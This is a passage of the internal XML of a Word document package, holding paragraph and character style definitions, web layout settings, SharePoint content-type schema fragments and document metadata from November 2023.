    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00991A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91A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91A38"/>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1A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>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991A38"/>
    <w:rPr>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00991A38"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006879FF"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006879FF"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00313734"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BC7D75"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F86D9A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA76CC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D86F59"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D86F59"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D86F59"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D86F59"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D86F59"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D83D1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0066">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="681853698">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="200"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1053383716">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="200"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1494832220">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="200"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1824198581">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="200"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2046590416">
          <w:marLeft w:val="446"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="200"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1004935181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="13946964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FDC77D08DDF6743BD99E8774A360AB2" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c3254b9714cc4bda48eb10e027f0b544">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="b87a6222-57a7-4658-b5d6-d7ab74f4daef" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="899ab5bd903d29ba064ad9b2ec64aa7a" ns2:_="">
    <xsd:import namespace="b87a6222-57a7-4658-b5d6-d7ab74f4d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a6222-57a7-4658-b5d6-d7ab74f4d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E5F799-AE3E-4ED6-B999-979B56A97D67}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D81FC7B6-1CC3-44ED-8D33-E6ED51B9AB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5FDC68-F35B-4C88-B1FC-4FA4D62441EF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps5.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{129C2F6B-A836-43C4-BBE3-760E914F4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a6222-57a7-4658-b5d6-d7ab74f4d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2023-11-16T00:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-16T01:13:00Z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0x010100BFDC77D08DDF6743BD99E8774A360AB2</vt:lpwstr>
  </property>
</Properties>
</file>